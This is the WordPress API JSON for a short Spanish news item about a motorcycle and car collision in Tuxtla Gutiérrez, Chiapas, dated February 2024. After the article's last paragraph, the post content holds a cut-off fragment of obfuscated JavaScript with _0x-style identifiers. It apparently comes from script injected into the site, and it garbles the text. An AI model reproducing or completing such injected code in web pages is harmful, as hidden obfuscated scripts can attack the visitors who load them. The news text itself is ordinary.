{"id":14079,"date":"2024-02-10T00:46:50","date_gmt":"2024-02-10T00:46:50","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14079"},"modified":"2024-02-10T00:46:51","modified_gmt":"2024-02-10T00:46:51","slug":"motociclista-y-automovil-colisionan-en-la-5a-norte","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14079","title":{"rendered":"Motociclista y autom\u00f3vil colisionan en la 5a Norte"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1707525907190-576x1024.jpg\" alt=\"\" class=\"wp-image-14080\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1707525907190-576x1024.jpg 576w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1707525907190-169x300.jpg 169w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1707525907190-768x1366.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1707525907190-864x1536.jpg 864w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1707525907190.jpg 899w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 9 de febrero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un autom\u00f3vil particular y un motociclista protagonizaron un accidente de tr\u00e1nsito en la 5a Norte y 13 Poniente de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes de tr\u00e1nsito informaron que, este hecho ocurri\u00f3 cuando una motocicleta Italika de color negro con rojo, se desplazaba de Oriente a Poniente, cuando el Sedan intent\u00f3 dar vuelta en U, ocasionado corte de circulaci\u00f3n y que la moto se impactara de lleno.<\/p>\n\n\n\n<p>Por el golpe, el motociclista sali\u00f3 volando y se estrell\u00f3 contra el pavimento.<\/p>\n\n\n\n<p>El conductor de la moto pidi\u00f3 apoyo al 911, afortunadamente no amerit\u00f3 ser trasladado a un nosocomio.<\/p>\n\n\n\n<p>Los dos involucrados llegaron a un acuerdo armonioso y posteriormente siguieron su camino.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 9 de febrero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un autom\u00f3vil particular y un motociclista protagonizaron un accidente de tr\u00e1nsito en la 5a Norte y 13 Poniente de Tuxtla Guti\u00e9rrez. Los reportes de tr\u00e1nsito informaron que, este hecho ocurri\u00f3 cuando una motocicleta Italika de color negro con rojo, se desplazaba de Oriente &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14080,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-14079","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14079","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14079"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14079\/revisions"}],"predecessor-version":[{"id":14081,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14079\/revisions\/14081"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14080"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14079"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14079"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14079"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}